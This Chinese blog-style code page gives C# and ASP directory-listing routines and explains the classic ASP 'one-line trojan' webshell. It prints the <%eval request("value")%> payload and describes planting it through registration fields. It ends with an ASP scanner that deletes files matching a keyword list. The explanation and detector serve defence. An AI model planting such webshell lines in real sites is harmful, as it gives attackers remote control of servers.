手机版 扫码 文档 Doc 工具

贴心猫(imcat)(LOGO) 贴心猫(imcat) v5.4 --- 极轻、极简通用PHP网站系统!

  1. 贴心猫(Imcat)
  2. 贴心代码
  3. 详情

文件列表,一句话木马

发布:2011-10-28 08:28   点击871次   评论:0

文件列表

private   void   forFileLength(DirectoryInfo   directory)

{
DirectoryInfo[]   directorys   =   directory.GetDirectories();
FileInfo[]   files;
foreach   (DirectoryInfo   di   in   directorys)
{
forFileLength(di);
}
files   =   directory.GetFiles();
foreach(FileInfo   file   in   files)
{
string temp = file.DirectoryName.ToString();  //  当前路径件
string name = file.Name;    // name 文件名
}
}

sub ListFolderContents(path)
dim fs, folder, file, item, url
set fs = CreateObject("Scripting.FileSystemObject")
set folder = fs.GetFolder(path)

Response.Write("
  • " & folder.Name & " - " & folder.Files.Count & " files, " & folder.SubFolders.Count & " directories." & vbCrLf & "" & vbCrLf)
      for each item in folder.SubFolders
      ListFolderContents(item.Path)
      next

      for each item in folder.Files
      Response.Write("" & item.Name & "" & vbCrLf)
      next
      Response.Write("" & vbCrLf)
    Response.Write("" & vbCrLf)
    • end sub




    一句话木马

    黑客在注册信息的电子邮箱或者个人主页等中插入类似如下代码:

    <%execute request("value")%>
    <%eval request("value")%>(现在比较多见的,而且字符少,对表单字数有限制的地方特别的实用)
    当知道了数据库的URL,就可以利用本地一张网页进行连接得到Webshell。(不知道数据库也可以,只要知道<%eval request("value")%>这个文件被插入到哪一个ASP文件里面就可以了。)
    这就被称为一句话木马,它是基于B/S结构的。

    <%
    Function alertAndRemoveFile(PathAndFileName)
    on error resume next
    if instr("PathAndFileName",":")<1 then PathAndFileName=Server.mappath(PathAndFileName)
    dim MyFileObject,MyTextFile,NeedDel,StrCheckFile,str,tname,tnamefile
    alertAndRemoveFile=false
    Set MyFileObject=Server.CreateObject("Scripting.FileSystemObject")
    Set MyTextFile=MyFileObject.OpenTextFile(PathAndFileName)
    DO
    If MytextFile.AtEndOfStream Then Exit Do
    StrCheckFile=MytextFile.ReadLine
    if includeBadWord(StrCheckFile) Then ''调用判断函数
    alertAndRemoveFile="1"
    NeedDel="1"
    Exit Do
    End If
    Loop
    MYTextFile.Close
    If NeedDel="1" Then MyFileObject.DeleteFile PathAndFileName
    set MYTextFile=nothing
    set MyFileObject=nothing

    End Function


    ''检查文本是否有有害代码

    Function includeBadWord(FileStr)
    includeBadWord=false
    dim StrBadWord,ArrStrBadWord,i,a
    StrBadWord="server.|.createobject|execute|.encode|eval|request|language=|activexobject"   ''定义恶意代码
    ArrStrBadWord=split(StrBadWord,"|")
    For i=0 to ubound(ArrStrBadWord)
    a=trim(ArrStrBadWord(i))
    if Instr(LCase(FileStr),ArrStrBadWord(i))>0 and a<>"" Then
    includeBadWord=true
    Exit For
    End If
    Next
    End Function
    %>

    <%
    dim NeedDel
    NeedDel=alertAndRemoveFile(FileName1) ''检查有害代码
    If NeedDel="1" Then
    Response.Write " "
    response.end
    end if
    %>

    Catalog/类别
  • python/nodejs
  • php/mysql
  • asp/mssql
  • html/js/css
  • os/office
  • 精品美文
  • Peace小语
  • 杂项/临时
  • 系统新闻
  • 演示测试
    •  

    关于 GitHub 导航 部门 反馈

    提示:`/home.php`入口数据仅为演示功能,不构成任何交易凭证,也不承担相关风险和责任!

    Copyright © 2011-2018 xxxxx.com All rights reserved.

    Run:4.125/31.401(ms); 7(sql)/2.89(MB); comm:news/detail; Upd:2024-11-15 18:48:20